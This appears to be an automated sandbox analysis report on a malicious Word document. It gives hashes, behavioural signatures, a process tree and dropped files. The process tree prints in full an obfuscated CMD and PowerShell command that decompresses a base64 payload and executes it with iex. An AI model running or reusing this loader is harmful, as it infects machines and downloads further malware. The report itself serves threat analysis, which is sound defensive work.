Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/06/2024, 14:27

General

  • Target

    921c1014b8330f7c47f4945f33d1fef2_JaffaCakes118.doc

  • Size

    68KB

  • MD5

    921c1014b8330f7c47f4945f33d1fef2

  • SHA1

    9af9f1896d3325c5c35e46ae97e7367826c45a1b

  • SHA256

    6eb412246c1d0c24ff6e359da8111e85c5d8ac34324c41df40143e6d39bfd322

  • SHA512

    595befb336abf08c891bb8ba72de47bad0d4cf51a36ef5526eee3e94a7e097ce1900fd2b4498331b81a4837742bbde72c2f9631979acd3e4b8509257e99ed0d6

  • SSDEEP

    768:HvVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94eTGy66E7jMx8:Hvocn1kp59gxBK85fBt+a9bK7Q

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\921c1014b8330f7c47f4945f33d1fef2_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SYSTEM32\CMD.exe
      CMD CMd.exE /c "SEt mfa=(NEw-objECT sYSTem.Io.strEAmrEaDer( ( NEw-objECT io.comPreSsioN.deflATEsTReam( [io.memOrySTReam][CONvERT]::froMBasE64stRIng( 'TZBRa4MwFIX/Sh4Caekaafuw0SCUdpS6dWPQje5hLxpvl9iYOI2mTvzvU2Hg6/2+c+BcvNsrX4ObmygBbtErWHqGaKckaMtwkux8IqzN1p7nnKMFmKKOKTepF9TvQq+CzYiWGdwogFf9fJRPq+39P0slF6CggjyWQ3YfQWEvv+Nslndcc2l0pspisLblsebLw/Nx7H1DnksrwjTUmsbgibdloOIXQk+ZknZCNmTK8EFw5COyWDwQhj+d8zHoam0hzWbki8x6PiMUbkDYxeQQcjHB5yRCUqN+8rSxed3g7jX00TitTBjvpYLBuUN94ZQFujJXmAdd6XBhUddzZS0PLRdN2/4B' ) ,[sYSTeM.io.cOMPrEssIon.cOMPRESSioNmoDe]::DecomPReSS )), [TeXt.EnCodinG]::asCIi)).rEadtOEnd() ^|iex&& PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( ^& ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( & ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4808

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\118.exe

    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

  • C:\Users\Admin\AppData\Local\Temp\TCD7281.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pdkfjel0.qxi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1504-20-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-45-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-46-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-6-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-7-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-8-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-9-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-10-0x00007FF96E3B0000-0x00007FF96E3C0000-memory.dmp

    Filesize

    64KB

  • memory/1504-13-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-14-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-12-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-11-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-15-0x00007FF96E3B0000-0x00007FF96E3C0000-memory.dmp

    Filesize

    64KB

  • memory/1504-16-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-17-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-18-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-23-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-22-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-21-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-0-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-5-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-19-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-4-0x00007FF9B048D000-0x00007FF9B048E000-memory.dmp

    Filesize

    4KB

  • memory/1504-3-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-585-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-1-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-2-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-552-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-554-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-553-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-555-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-556-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-557-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-558-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-559-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-560-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-561-0x00007FF9B03F0000-0x00007FF9B05E5000-memory.dmp

    Filesize

    2.0MB

  • memory/1504-583-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-584-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-582-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/1504-581-0x00007FF970470000-0x00007FF970480000-memory.dmp

    Filesize

    64KB

  • memory/4808-56-0x000002CC58E20000-0x000002CC58E42000-memory.dmp

    Filesize

    136KB